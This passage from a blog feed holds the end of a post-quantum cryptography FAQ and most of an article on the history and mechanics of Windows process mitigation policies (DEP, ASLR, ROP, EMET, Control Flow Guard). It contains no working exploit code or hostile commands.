  { q: &quot;Why does the NIST FIPS slate combine a lattice scheme and a hash scheme rather than two lattice schemes?&quot;, a: &quot;Diversification. Both the Rainbow break (Beullens, February 2022) and the SIKE break (Castryck-Decru, July 2022) happened during the NIST competition. The portfolio rests on two structurally unrelated foundations (lattice + hash) so that a single mathematical break cannot retire the whole programme. SLH-DSA&apos;s security rests on hash-function security alone.&quot; },
  { q: &quot;Which SymCrypt version first added ML-KEM?&quot;, a: &quot;Version 103.5.0, which &apos;Add ML-KEM per final FIPS 203&apos; along with XMSS and XMSS^MT. Subsequent versions added LMS (103.6.0), ML-DSA (103.7.0), the FIPS approved-services indicator (103.8.0), ML-DSA External-Mu (103.9.0), FIPS CAST for ML-DSA (103.9.1), and Composite ML-KEM (103.11.0).&quot; },
  { q: &quot;What TLS Supported Group does Schannel preview-negotiate on 24H2, and what is its codepoint?&quot;, a: &quot;X25519MLKEM768, codepoint 0x11EC, per draft-ietf-tls-ecdhe-mlkem-04 (8 February 2026). The ClientHello carries 32 bytes X25519 + 1184 bytes ML-KEM-768 encapsulation key (1216 bytes total); the ServerHello carries 32 bytes X25519 + 1088 bytes ML-KEM-768 ciphertext (1120 bytes total).&quot; },
  { q: &quot;Why does ML-DSA-87 not fit on a commodity TPM 2.0 chip?&quot;, a: &quot;ML-DSA-87 signatures are 4595 bytes. Default TPM 2.0 MAX_COMMAND_SIZE and MAX_RESPONSE_SIZE are 4096 bytes. TCG TPM 2.0 Library Specification v1.85 (March 2026) introduces a streaming TPM2_SignSequence Start / Complete family (with TPM2_SignDigest / TPM2_VerifyDigestSignature for digest-mode operations) and ML-KEM TPM2_Encapsulate / Decapsulate, but v1.85-capable chips are in early sampling in 2026, not retail volume.&quot; },
  { q: &quot;What is the difference between LMS / XMSS and SLH-DSA, and when does CNSA 2.0 prefer each?&quot;, a: &quot;LMS and XMSS are stateful: the signer must track a counter and never reuse a leaf index. SLH-DSA derives the leaf address from the message hash and per-signature randomness, making it stateless. CNSA 2.0 specifies LMS or XMSS for firmware signing (where build pipelines already track counters under HSM custody) and ML-DSA-87 for general signing.&quot; },
  { q: &quot;Why does PQC not close the signed-binary persistence channel?&quot;, a: &quot;Authenticode signatures are validated at binary load time. A 2026 RSA-2048 signature has already been verified by every machine that downloaded the binary; a 2035 quantum break does not retroactively decrypt anything because Authenticode is not an encryption channel. The threat model is forgery of new signatures on new binaries, not retroactive decryption. Harvest-now-decrypt-later does not apply.&quot; }
]} /&amp;gt;&lt;/p&gt;
</content:encoded><category>windows</category><category>cryptography</category><category>post-quantum</category><category>pqc</category><category>tls</category><category>symcrypt</category><category>cng</category><category>fips</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>Process Mitigation Policies: CFG, ACG, CIG, and the Layer Between App Identity and the Kernel</title><link>https://paragmali.com/blog/process-mitigation-policies-cfg-acg-cig-and-the-layer-betwee/</link><guid isPermaLink="true">https://paragmali.com/blog/process-mitigation-policies-cfg-acg-cig-and-the-layer-betwee/</guid><description>A thirty-year history of Windows process mitigation policies -- DEP, ASLR, CFG, XFG, CET, ACG, CIG -- and the structural reason each one exists.</description><pubDate>Mon, 11 May 2026 00:00:00 GMT</pubDate><content:encoded>
Windows ships every modern memory-corruption mitigation as a per-process flag rather than a system-wide setting -- because Outlook can&apos;t enable CIG, Defender can&apos;t enable ACG, and Notepad doesn&apos;t need Disable-Win32k. `SetProcessMitigationPolicy` exposes twenty of these knobs (plus a `MaxProcessMitigationPolicy` sentinel that terminates the enum); the canonical six (DEP, ASLR, CFG, CET shadow stack, ACG, CIG) constrain the control-flow primitives, and the other fourteen cover adjacent attack surfaces. Each knob is a tombstone for an exploit primitive that worked in the previous generation. This article walks the thirty-year arc that built that surface, then names the residual attacks that survive even a fully-stacked process.
&lt;h2&gt;1. The bug is still there. Why didn&apos;t the exploit work?&lt;/h2&gt;
&lt;p&gt;A vulnerability researcher has just landed a type-confusion bug in a JavaScript engine inside an Edge content process. The primitive is exactly what they expected: a writable heap address holding a corrupted vtable pointer. From that pointer the renderer will, on its very next virtual-method call, jump into an address the attacker chose.&lt;/p&gt;
&lt;p&gt;That is supposed to be game over. It is, in the language of every exploit-development textbook from 1996 onward, a working write-what-where. The CPU loads the corrupted pointer into a register. It dereferences it. It calls.&lt;/p&gt;
&lt;p&gt;And the process dies.&lt;/p&gt;
&lt;p&gt;There is no shell. There is no remote code execution. There is a Windows Error Reporting dialog and a &lt;code&gt;STATUS_STACK_BUFFER_OVERRUN&lt;/code&gt; (also written &lt;code&gt;FAST_FAIL_GUARD_ICALL_CHECK_FAILURE&lt;/code&gt;) in the crash log, raised from a thunk named &lt;code&gt;ntdll!LdrpValidateUserCallTarget&lt;/code&gt; the researcher has never seen in their disassembler before. The bug fired exactly as the recipe said. The exploit chain didn&apos;t.&lt;/p&gt;
&lt;p&gt;What stopped it?&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Every per-process mitigation in &lt;code&gt;SetProcessMitigationPolicy&lt;/code&gt; is a tombstone for an exploit primitive that worked in the previous generation. The list of policies is, read top to bottom, an attacker&apos;s autobiography [@ms-setprocessmitigationpolicy].&lt;/p&gt;
&lt;/blockquote&gt;

A per-process, opt-in security policy installed via the Win32 `SetProcessMitigationPolicy` API (or, more safely, via `UpdateProcThreadAttribute` before a child process executes its first user-mode instruction). The `PROCESS_MITIGATION_POLICY` enum lists twenty-one values -- twenty actual policies plus the `MaxProcessMitigationPolicy` sentinel that terminates the enum -- as of Windows 11 24H2, each one a separate axis on which an exploit can fail [@ms-process-mitigation-enum, @ms-setprocessmitigationpolicy].
&lt;p&gt;The fastest way to see this is to compare two PowerShell sessions. Pick a maximally-hardened process, the Edge content process, and run &lt;code&gt;Get-ProcessMitigation -Name msedge.exe&lt;/code&gt;. Six mitigations show as ON: CFG, CET shadow stack, ACG, CIG, Disable-Win32k, and Disable-Extension-Points. Now do the same for &lt;code&gt;Notepad.exe&lt;/code&gt;. One or two show as ON. Notepad is a different &lt;em&gt;kind&lt;/em&gt; of process -- it is not parsing attacker-controlled bytes from the public internet, so the mitigation surface it carries is correspondingly small.&lt;/p&gt;
&lt;p&gt;The mitigation set is not just an enable-everything list. Several of the policies are mutually expensive (CET costs cycles on every call/ret; ACG forbids any in-process JIT; CIG forbids any third-party plugin); turning them all on is only viable for a process whose owner accepts those costs. The PowerShell &lt;code&gt;Set-ProcessMitigation&lt;/code&gt; and &lt;code&gt;Get-ProcessMitigation&lt;/code&gt; cmdlets ship in the &lt;code&gt;ProcessMitigations&lt;/code&gt; module that succeeded EMET in 2018.&lt;/p&gt;
&lt;p&gt;Edge carries six mitigations because it has six structurally separate ways the attacker can win. CFG addresses the indirect-call hijack. CET addresses the return-address hijack. ACG addresses the &quot;redirect the JIT to emit my shellcode&quot; hijack. CIG addresses the &quot;plant a Microsoft-signed DLL where the loader picks it up&quot; hijack. Disable-Win32k addresses the renderer-to-kernel escape. Disable-Extension-Points addresses the &lt;code&gt;AppInit_DLLs&lt;/code&gt;-class injection.&lt;/p&gt;
&lt;p&gt;Each one is the closing footnote on a different generation of offensive research. CFG closes indirect-call hijacking. CET closes the shadow-stack-less era. ACG closes JIT spray. CIG closes signed-DLL planting. &lt;code&gt;Get-ProcessMitigation&lt;/code&gt; lays them out as a flat list of &lt;code&gt;ON&lt;/code&gt; checkmarks, as if they had always been there -- as if they had not each cost a decade of research to design and ship.&lt;/p&gt;
&lt;p&gt;So the chain failed. But &lt;em&gt;which&lt;/em&gt; mitigation caught the indirect-call hijack we started with -- and why was that one on? Where do these mitigations come from, and how did Windows arrive at this exact set? To answer that, we have to go back three decades.&lt;/p&gt;
&lt;h2&gt;2. How attackers stopped being able to put bytes on the stack and run them&lt;/h2&gt;
&lt;p&gt;The story starts in November 1996. &lt;em&gt;Phrack&lt;/em&gt; magazine, issue forty-nine, file fourteen of sixteen. Aleph One -- the handle of Elias Levy, a security columnist who would later moderate the BugTraq mailing list -- publishes &lt;em&gt;Smashing The Stack For Fun And Profit&lt;/em&gt; [@phrack-49-14]. The article is a recipe. It walks the reader through process memory layout on Unix, the structure of the call stack on x86, the mechanics of overwriting the saved return address, the construction of &lt;code&gt;/bin/sh&lt;/code&gt; shellcode, and the use of NOP sleds. Those four programs (&lt;code&gt;syslog&lt;/code&gt;, &lt;code&gt;splitvt&lt;/code&gt;, &lt;code&gt;sendmail 8.7.5&lt;/code&gt;, Linux/FreeBSD &lt;code&gt;mount&lt;/code&gt;) appear in the introduction as real overflows others had found; the paper&apos;s own worked exploit code targets a small sample vulnerable program that, installed setuid root, would have yielded a root shell.&lt;/p&gt;
&lt;p&gt;Buffer overflows existed before Aleph One. The 1988 Morris Worm used one in &lt;code&gt;fingerd&lt;/code&gt;; Mudge&apos;s 1995 &lt;em&gt;How to Write Buffer Overflows&lt;/em&gt; L0pht paper had pieces of the technique. But it was an oral tradition -- something you learned at DEFCON or from someone who learned it at DEFCON. Aleph One&apos;s contribution was pedagogical: a step-by-step recipe anyone with a debugger and an afternoon could follow. Once that recipe was published, every memory-safety bug in C and C++ -- and there were many -- became a candidate for shell-as-the-vendor.&lt;/p&gt;
&lt;p&gt;The defensive response came fast, and it came with a brutal honesty that has shaped every later mitigation. In August 1997, Alexander Peslyak, writing under the handle Solar Designer and running the Openwall Project, posted to BugTraq [@solar-designer-bugtraq-1997]. He had two things. The first was a Linux kernel patch -- still documented at the Openwall README to this day -- that made user-mode stack pages non-executable in software, since AMD&apos;s hardware NX bit was six years away [@openwall-readme]. The second was a working return-into-libc exploit against &lt;code&gt;lpr&lt;/code&gt;, which redirected execution into &lt;code&gt;system()&lt;/code&gt; in the C library rather than into stack-resident shellcode.Solar Designer was honest enough to publish the bypass on the same day as the patch. This is a defender-publishes-own-bypass precedent that has governed almost every Microsoft mitigation announcement since: ship the mitigation, name the residual attack class, set the expectation that the mitigation is a speed bump rather than a fix.&lt;/p&gt;

A memory protection invariant -- &quot;write XOR execute&quot; -- requiring that any page in the process address space be either writable or executable, but never both at the same time. PaX shipped the first complete implementation of W^X on Linux in 2000; AMD&apos;s NX bit in 2003 moved it from software emulation to hardware enforcement; the per-process ACG policy in Windows generalises W^X to apply for the lifetime of an entire process, with no per-thread escape hatch.
&lt;p&gt;The next move was structural. In September 2000 the pseudonymous PaX Team released PAGEEXEC, the Linux non-executable-page implementation that made every writable page non-executable (not just the stack), using clever x86 segment-limit and split-TLB tricks [@wiki-pax]. PaX is also where the term &quot;ASLR&quot; comes from. The July 2001 PaX patch series randomized the executable base, the stack, the heap, the &lt;code&gt;mmap&lt;/code&gt;&apos;d library region, and (with &lt;code&gt;RANDEXEC&lt;/code&gt;) even the position of the executable&apos;s code segment. The PaX design document for ASLR is unusually rigorous about probability -- it derives the expected number of brute-force attempts as a function of entropy bits, decades before anyone framed it that way in the academic literature.&lt;/p&gt;

Address Space Layout Randomization. Per-boot or per-load randomization of the locations at which the kernel maps modules, the stack, the heap, and `mmap`&apos;d regions into a process&apos;s virtual address space. On x86-32 Windows Vista, modules had one of 256 possible base addresses (about 8 bits of entropy). On x64 with `/HIGHENTROPYVA`, entropy is much higher because the virtual address space is larger. ASLR is the precondition that makes every later forward-edge CFI scheme worth deploying -- without it, the attacker just hardcodes the call target.
&lt;p&gt;Hardware finally caught up on September 23, 2003. AMD shipped the no-execute bit -- &quot;NX bit,&quot; bit 63 of the 64-bit long-mode page-table entry -- with the Athlon 64 launch [@wiki-nx-bit]. Intel followed with the marketing-renamed &quot;XD bit&quot; in later Pentium 4 Prescott silicon. From 2003 onward, marking a page non-executable was a single PTE flag away.&lt;/p&gt;
&lt;p&gt;Microsoft consumed the hardware almost immediately. Windows XP Service Pack 2, RTM August 6, 2004, shipped Data Execution Prevention as a system-wide feature. DEP defaulted to OptIn but supported four system-level modes (OptIn, OptOut, AlwaysOn, AlwaysOff) and exposed a per-binary opt-in via the &lt;code&gt;/NXCOMPAT&lt;/code&gt; PE-header flag. On hardware without NX, DEP fell back to a software emulation limited to system-supplied binaries.&lt;/p&gt;
&lt;p&gt;The Wikipedia ROP article frames this moment exactly: &quot;Microsoft Windows provided no buffer-overrun protections until 2004&quot; [@wiki-rop]. After XP SP2, Windows joined PaX, OpenBSD, and Solar Designer&apos;s Openwall on the W^X side of the line.&lt;/p&gt;
&lt;p&gt;Three years later, in January 2007, Microsoft shipped Vista. Vista randomized DLL and EXE module bases at boot, with 256 possible load locations per module on x86. Michael Howard&apos;s MSDN design blog from May 2006 gives a worked example showing &lt;code&gt;wsock32.dll&lt;/code&gt; at &lt;code&gt;0x73ad0000&lt;/code&gt; on one boot and &lt;code&gt;0x73200000&lt;/code&gt; on the next [@ms-howard-vista-aslr]. Vista paired ASLR with &lt;code&gt;/GS&lt;/code&gt; stack canaries, &lt;code&gt;/SafeSEH&lt;/code&gt; validated SEH chains, DEP, and pointer obfuscation -- the first Microsoft OS to ship a layered exploit-mitigation stack as policy.&lt;/p&gt;

flowchart LR
    A[1996 Nov&lt;br /&gt;Aleph One&lt;br /&gt;Phrack 49 14] --&amp;gt; B[1997 Aug&lt;br /&gt;Solar Designer&lt;br /&gt;non-exec stack&lt;br /&gt;+ return-into-libc]
    B --&amp;gt; C[2000 Sep&lt;br /&gt;PaX Team&lt;br /&gt;PAGEEXEC]
    C --&amp;gt; D[2001 Jul&lt;br /&gt;PaX&lt;br /&gt;first ASLR]
    D --&amp;gt; E[2003 Sep&lt;br /&gt;AMD NX bit&lt;br /&gt;Athlon 64]
    E --&amp;gt; F[2004 Aug&lt;br /&gt;Microsoft DEP&lt;br /&gt;Windows XP SP2]
    F --&amp;gt; G[2006 May&lt;br /&gt;Microsoft&lt;br /&gt;Vista ASLR design]
    G --&amp;gt; H[2007 Jan&lt;br /&gt;Vista GA&lt;br /&gt;layered mitigation]
&lt;p&gt;DEP and ASLR are not per-process mitigations in the modern sense. They are the system-wide foundation that the per-process surface sits on top of. The reason &lt;code&gt;ProcessDEPPolicy&lt;/code&gt; still exists in the modern enum at all is to give 32-bit processes a way to enforce DEP locally even when the system policy is permissive. On x64, DEP is unconditionally on; the per-process knob is a vestigial 32-bit-only flag. &lt;code&gt;ProcessASLRPolicy&lt;/code&gt; is more useful -- it allows a process to force-on high-entropy bottom-up randomization with &lt;code&gt;ForceRelocateImages&lt;/code&gt; -- but it too is a refinement of a system-wide foundation, not a new defensive primitive [@ms-setprocessmitigationpolicy].&lt;/p&gt;
&lt;p&gt;By 2007, the story should have been over. DEP had made shellcode unrunnable. ASLR had made gadget addresses unpredictable. Every attacker primitive Aleph One named in 1996 was, in principle, defended. It was not.&lt;/p&gt;
&lt;p&gt;Because the attacker did not need to write new bytes. They could reuse the bytes that were already there.&lt;/p&gt;
&lt;h2&gt;3. ASLR plus DEP made shellcode hard, so attackers stopped writing shellcode&lt;/h2&gt;
&lt;p&gt;October 2007. Hovav Shacham, then on the UC San Diego computer-science faculty after a postdoctoral fellowship at the Weizmann Institute, presents &lt;em&gt;The Geometry of Innocent Flesh on the Bone: Return-into-libc without Function Calls (on the x86)&lt;/em&gt; at ACM CCS [@shacham-rop-pdf]. The paper&apos;s existence claim is simple and devastating: in any sufficiently large C library, the set of short instruction sequences ending in &lt;code&gt;ret&lt;/code&gt; is Turing-complete. The attacker does not need to inject any new code. They only need to write data -- a sequence of return addresses on the stack -- and the CPU obediently executes already-mapped, already-executable libc bytes in the attacker&apos;s chosen order.&lt;/p&gt;
&lt;p&gt;The mechanism is small enough to explain in a paragraph. Shacham named the technique &lt;em&gt;return-oriented programming&lt;/em&gt;. The attacker arranges for the program to return into a &lt;em&gt;gadget&lt;/em&gt; -- a short sequence of one to four instructions ending in &lt;code&gt;ret&lt;/code&gt;. The gadget is selected from existing executable memory: libc, ntdll, the program&apos;s own code segment. The instructions perform a useful primitive (load a register, do arithmetic, dereference a pointer). The trailing &lt;code&gt;ret&lt;/code&gt; pops the next stack slot, which the attacker has populated with the address of the next gadget. The stack is now the program counter; the CPU is now a Turing-complete machine for whatever language the gadget catalog implements.&lt;/p&gt;

An exploitation technique in which the attacker chains short, existing instruction sequences (&quot;gadgets&quot;) each ending in `ret`. Control transfers happen via the program&apos;s own return instructions, executing already-mapped, already-executable code. ROP defeats W^X (DEP, NX) because the attacker injects no new code; it weakens against ASLR but does not break under it because info-leak primitives recover the gadget base address. Coined by Hovav Shacham in 2007 [@shacham-rop-pdf].
&lt;p&gt;The follow-up Black Hat USA 2008 talk generalised the result to RISC architectures [@shacham-bhusa-2008], killing &quot;x86&apos;s variable-length instructions are why ROP works&quot; as a defensive direction. ROP works on ARM. ROP works on MIPS. ROP works wherever an attacker can predict the address of executable bytes and control the stack.&lt;/p&gt;

Return-oriented programming allows an attacker to execute code in the presence of security defenses such as executable space protection. -- Wikipedia, *Return-oriented programming*, lead paragraph [@wiki-rop]
&lt;p&gt;After 2007, the structural agenda of every defensive engineering team on Windows changes. The question is no longer &quot;can we stop the attacker from writing bytes into executable pages?&quot; -- DEP solved that, and ROP routed around it. The question is now: &quot;which control transfers is the attacker allowed to cause?&quot;&lt;/p&gt;
&lt;p&gt;Shacham&apos;s UCSD lab (later UT Austin) kept exploring the boundary between code-reuse attacks and provable software defenses. The 2007 paper is the field-shaping one; the 2008 BHUSA generalisation to RISC was the closing argument.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; After Shacham 2007, every defensive engineering decision in Windows mitigation has been about which control-flow transfers the attacker is allowed to cause, not about what bytes the attacker can write. This is the article&apos;s load-bearing axis. CFG, XFG, CET, ACG, CIG, and every smaller mitigation in &lt;code&gt;PROCESS_MITIGATION_POLICY&lt;/code&gt; follows from this one shift.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Microsoft&apos;s first response was behavioral, not structural. In 2009 the company released the &lt;em&gt;Enhanced Mitigation Experience Toolkit&lt;/em&gt; (EMET), a free shim DLL that injected runtime checks into existing user-mode processes to detect ROP-shaped behavior. EMET checked for stack pivots, for unaligned &lt;code&gt;ret&lt;/code&gt;-targets, for known-malicious gadget sequences, for unusual SEH chain layouts. It worked, intermittently, for a while. Then attackers adjusted, gadget-replacing around EMET&apos;s heuristics, and Microsoft slowly conceded the behavioral-detection direction was a dead end. EMET&apos;s final release was 5.52 in November 2016; end of life was July 31, 2018 [@wiki-emet]. Microsoft&apos;s stated successors are the &lt;code&gt;ProcessMitigations&lt;/code&gt; PowerShell module and Windows Defender Exploit Guard -- i.e., the formal &lt;code&gt;SetProcessMitigationPolicy&lt;/code&gt; surface this article catalogs [@wiki-emet].&lt;/p&gt;

EMET was an honorable failure. It taught the security industry that you cannot detect a control-flow hijack by looking at its symptoms; you can only prevent it by enforcing an invariant on the control flow itself. That lesson is exactly what Control Flow Guard (CFG) and Control-Flow Enforcement Technology (CET) embody. Every behavioral-ROP-detection product since EMET (Carbon Black&apos;s BB exploit protection, Symantec&apos;s Heat Shield, vendor-specific EDR ROP checks) has had the same fate against motivated adversaries -- you can buy time but you cannot fix the problem in heuristics.
&lt;p&gt;The structural answer arrived two years before the offensive proof that motivated it. In November 2005, at ACM CCS, Martín Abadi, Mihai Budiu, Úlfar Erlingsson, and Jay Ligatti published &lt;em&gt;Control-Flow Integrity&lt;/em&gt; (also released as Microsoft Research Technical Report MSR-TR-2005-18) [@msr-cfi]. Their formal definition is short: &lt;em&gt;the execution of a program dynamically follows only paths defined by a static control-flow graph&lt;/em&gt;. They proved CFI is enforceable using compile-time-inserted runtime checks and demonstrated a software rewriting implementation.&lt;/p&gt;

A defensive property formalized by Abadi, Budiu, Erlingsson, and Ligatti in 2005 [@msr-cfi]: the execution of a program must dynamically follow only paths defined by the static control-flow graph (CFG) of the program. CFI partitions into a forward-edge property (the targets of indirect calls and jumps must be valid) and a backward-edge property (the targets of returns must be the call-sites that called them). CFG, XFG, kCFG, and Apple&apos;s PAC are forward-edge CFI implementations. CET&apos;s shadow stack is a backward-edge CFI implementation.
&lt;p&gt;CFI was a research framework looking for a vendor. It would wait nine years. The reader&apos;s belief at this point might be &quot;DEP plus ASLR is enough.&quot; The honest belief, after Shacham, is that DEP plus ASLR raises the cost but does not change the game. The attacker still wins if they can choose where the next &lt;code&gt;ret&lt;/code&gt; lands. The structural answer -- constraining the control transfer rather than the write -- is what makes Control Flow Guard make sense.&lt;/p&gt;
&lt;p&gt;What does &lt;em&gt;constraining the control transfer&lt;/em&gt; look like in machine code?&lt;/p&gt;
&lt;h2&gt;4. Control Flow Guard (CFG): compile-time, load-time, runtime&lt;/h2&gt;
&lt;p&gt;Where DEP was enforced by hardware on every page, CFG is enforced by software on every indirect call. The compiler is now a security tool.&lt;/p&gt;
&lt;p&gt;CFG&apos;s ship history is more complicated than the marketing remembers. The canonical primary on the early dates is Yunhai Zhang&apos;s Black Hat USA 2015 deck, &lt;em&gt;Bypass Control Flow Guard Comprehensively&lt;/em&gt;, which states verbatim: &quot;It was first introduced in Windows 8.1 Preview, but disabled in Windows 8.1 RTM for compatibility reason. Then, it was improved and enabled in Windows 10 Technical Preview and Windows 8.1 Update&quot; [@zhang-bhusa15]. Visual Studio 2015 added the compiler and linker flags. By the time Windows 10 shipped to consumers in July 2015, CFG was a documented Win32 security feature [@ms-cfg-doc].Stage 1 had this ship date as &quot;Windows 8.1 Update 3 November 2014 vs Windows 10 July 2015&quot;. Zhang&apos;s deck is the contemporaneous primary that resolves the dispute. CFG was in Windows 8.1 Preview, was &lt;em&gt;removed&lt;/em&gt; from Windows 8.1 RTM for compatibility, returned in Windows 8.1 Update and Windows 10 Technical Preview, and shipped widely with Windows 10 in 2015.&lt;/p&gt;
&lt;p&gt;The mechanism has four phases. Each phase is a separate engineering subsystem, owned by a different team.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Phase 1: Compile-time&lt;/strong&gt; (&lt;code&gt;/guard:cf&lt;/code&gt;). The MSVC compiler emits, before every indirect call instruction, a call to one of two compiler-supplied thunks: &lt;code&gt;__guard_check_icall_fptr&lt;/code&gt; for the standard pattern, or &lt;code&gt;__guard_dispatch_icall_fptr&lt;/code&gt; for the tail-call optimization where the validator itself jumps to the target [@ms-guard-cf-compiler]. The thunk is a single indirection through ntdll. At compile time it is a stub; at load time it is patched to point at the active validator.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Phase 2: Link-time&lt;/strong&gt; (&lt;code&gt;/GUARD:CF&lt;/code&gt;, which requires &lt;code&gt;/DYNAMICBASE&lt;/code&gt;). The linker writes the &lt;em&gt;Guard CF Function Table&lt;/em&gt; (FID table) into the PE image&apos;s &lt;code&gt;IMAGE_LOAD_CONFIG_DIRECTORY&lt;/code&gt; [@ms-guard-cf-linker]. This table is the static catalog of every CFG-valid call target in this binary: every function whose address is taken, plus every function exported. &lt;code&gt;dumpbin /headers /loadconfig &amp;lt;binary&amp;gt;&lt;/code&gt; prints the table contents -- you can read the actual &lt;code&gt;Guard CF&lt;/code&gt; flag word and the &lt;code&gt;FID table present&lt;/code&gt; line.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The MSVC linker only emits the FID table when &lt;code&gt;/DYNAMICBASE&lt;/code&gt; is also set [@ms-guard-cf-compiler, @ms-guard-cf-linker]. A binary compiled with &lt;code&gt;/guard:cf&lt;/code&gt; but linked without &lt;code&gt;/DYNAMICBASE&lt;/code&gt; will pass code review, ship, and provide zero protection at runtime. This is the single most common CFG misconfiguration in third-party software. Always confirm with &lt;code&gt;dumpbin /headers /loadconfig&lt;/code&gt; that the &lt;code&gt;Guard Flags&lt;/code&gt; word is non-zero and that &lt;code&gt;FID Table present&lt;/code&gt; is in the output.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;strong&gt;Phase 3: Load-time.&lt;/strong&gt; At process startup and on every subsequent &lt;code&gt;LoadLibrary&lt;/code&gt;, &lt;code&gt;ntdll!LdrpProtectAndRelocateImage&lt;/code&gt; unions the FID table of the loaded image into a per-process &lt;em&gt;bitmap&lt;/em&gt;. The bitmap is a sparse data structure with one bit per 8 bytes of virtual address space. On 32-bit Windows, that is about 32 megabytes of address space worth of valid-target bits. On x64, the address space is so large the bitmap is hundreds of megabytes sparse-allocated -- but the memory only commits on access, so the resident set stays small.&lt;/p&gt;

A sparse, per-process bit vector indexed by virtual address (one bit per 8 bytes). A set bit at index `addr / 8` means that `addr` is a CFG-valid indirect-call target in some loaded image. The kernel commits the bitmap pages on first access and shares them copy-on-write across processes with identical module-load layouts. The bitmap is the runtime data structure that `LdrpValidateUserCallTarget` consults on every indirect call.
&lt;p&gt;&lt;strong&gt;Phase 4: Runtime.&lt;/strong&gt; Every indirect call goes through &lt;code&gt;ntdll!LdrpValidateUserCallTarget&lt;/code&gt;. The validator takes the call target in &lt;code&gt;rcx&lt;/code&gt; (x64 calling convention), divides by 8, indexes into the bitmap, and tests the bit. If set, return; the call proceeds. If clear, fall through to &lt;code&gt;__fastfail(FAST_FAIL_GUARD_ICALL_CHECK_FAILURE)&lt;/code&gt;, which raises &lt;code&gt;STATUS_STACK_BUFFER_OVERRUN&lt;/code&gt;. The process dies.&lt;/p&gt;

sequenceDiagram
    participant Src as C++ source
    participant CC as &quot;MSVC /guard:cf&quot;
    participant Ln as &quot;Linker /GUARD:CF /DYNAMICBASE&quot;
    participant Ldr as ntdll loader
    participant Rt as Runtime
    Src-&amp;gt;&amp;gt;CC: address-taken funcs plus indirect call sites
    CC-&amp;gt;&amp;gt;Ln: object file plus FID hints
    Ln-&amp;gt;&amp;gt;Ldr: PE with FID table in load-config dir
    Ldr-&amp;gt;&amp;gt;Ldr: union FID table into bitmap
    Note over Ldr: one bit per 8 bytes
    Rt-&amp;gt;&amp;gt;Ldr: indirect call via LdrpValidateUserCallTarget
    alt bit set
        Ldr-&amp;gt;&amp;gt;Rt: proceed
    else bit clear
        Ldr-&amp;gt;&amp;gt;Rt: fastfail STATUS_STACK_BUFFER_OVERRUN
    end
&lt;p&gt;There is an exception: code that is generated at runtime, like a JavaScript JIT, cannot have its targets pre-baked into a static FID table. For this case, CFG exposes &lt;code&gt;SetProcessValidCallTargets&lt;/code&gt;, which lets a process programmatically mark an in-process address range as a permitted call target [@ms-cfg-doc]. The companion &lt;code&gt;PAGE_TARGETS_INVALID&lt;/code&gt; and &lt;code&gt;PAGE_TARGETS_NO_UPDATE&lt;/code&gt; page-protection flags let the process control which newly-allocated pages start with a clear bitmap. The reason this API exists at all is the structural collision between W^X-via-CFG and runtime code generation -- a collision that section 8 (ACG) will eventually resolve by moving the JIT out of process.&lt;/p&gt;
&lt;p&gt;You can read the load-config flag word directly. The hex value is a bit field of &lt;code&gt;IMAGE_GUARD_*&lt;/code&gt; constants. The most common bits are &lt;code&gt;IMAGE_GUARD_CF_INSTRUMENTED&lt;/code&gt; (the binary has CFG indirect-call checks), &lt;code&gt;IMAGE_GUARD_CFW_INSTRUMENTED&lt;/code&gt; (the binary has CFG indirect-call checks plus write-protection checks), &lt;code&gt;IMAGE_GUARD_CF_FUNCTION_TABLE_PRESENT&lt;/code&gt; (the FID table is in the PE), &lt;code&gt;IMAGE_GUARD_CF_LONGJUMP_TABLE_PRESENT&lt;/code&gt;, and &lt;code&gt;IMAGE_GUARD_RETPOLINE_PRESENT&lt;/code&gt;. The decoder is short enough to inline:&lt;/p&gt;
&lt;p&gt;{`
const FLAGS = [
  [0x00000100, &apos;IMAGE_GUARD_CF_INSTRUMENTED&apos;],
  [0x00000200, &apos;IMAGE_GUARD_CFW_INSTRUMENTED&apos;],
  [0x00000400, &apos;IMAGE_GUARD_CF_FUNCTION_TABLE_PRESENT&apos;],
  [0x00000800, &apos;IMAGE_GUARD_SECURITY_COOKIE_UNUSED&apos;],
  [0x00001000, &apos;IMAGE_GUARD_PROTECT_DELAYLOAD_IAT&apos;],
  [0x00002000, &apos;IMAGE_GUARD_DELAYLOAD_IAT_IN_ITS_OWN_SECTION&apos;],
  [0x00004000, &apos;IMAGE_GUARD_CF_EXPORT_SUPPRESSION_INFO_PRESENT&apos;],
  [0x00008000, &apos;IMAGE_GUARD_CF_ENABLE_EXPORT_SUPPRESSION&apos;],
  [0x00010000, &apos;IMAGE_GUARD_CF_LONGJUMP_TABLE_PRESENT&apos;],
  [0x00020000, &apos;IMAGE_GUARD_RF_INSTRUMENTED&apos;],
  [0x00040000, &apos;IMAGE_GUARD_RF_ENABLE&apos;],
  [0x00080000, &apos;IMAGE_GUARD_RF_STRICT&apos;],
  [0x00100000, &apos;IMAGE_GUARD_RETPOLINE_PRESENT&apos;],
];&lt;/p&gt;
&lt;p&gt;// Real-world example value from a fully-instrumented MSVC 2022 binary
const guardFlags = 0x0001050C;
console.log(&apos;Guard Flags = 0x&apos; + guardFlags.toString(16).padStart(8, &apos;0&apos;));
for (const [bit, name] of FLAGS) {
  if (guardFlags &amp;amp; bit) console.log(&apos;  set: &apos; + name);
}
`}&lt;/p&gt;
&lt;p&gt;CFG is forward-edge only. The &lt;code&gt;ret&lt;/code&gt; instruction is invisible to it. A ROP chain that uses only return-target gadgets -- the original Shacham construction -- is not affected by CFG at all, because CFG never asks &quot;where did this &lt;code&gt;ret&lt;/code&gt; go?&quot; It only asks &quot;where did this indirect call go?&quot; Closing the backward edge is a separate problem (section 6).&lt;/p&gt;
&lt;p&gt;CFG is also &lt;em&gt;coarse-grained&lt;/em&gt;. The bitmap records &quot;is this address a valid function entry?&quot; but not &quot;is this address a valid function entry &lt;em&gt;for this particular call site&apos;s prototype?&lt;/em&gt;&quot; Any function entry in the entire process is a valid CFG target for every indirect call site. If the attacker finds a legitimate function that takes a controllable argument and does something useful, they can chain it into a working exploit without ever flipping a clear bit to set.&lt;/p&gt;
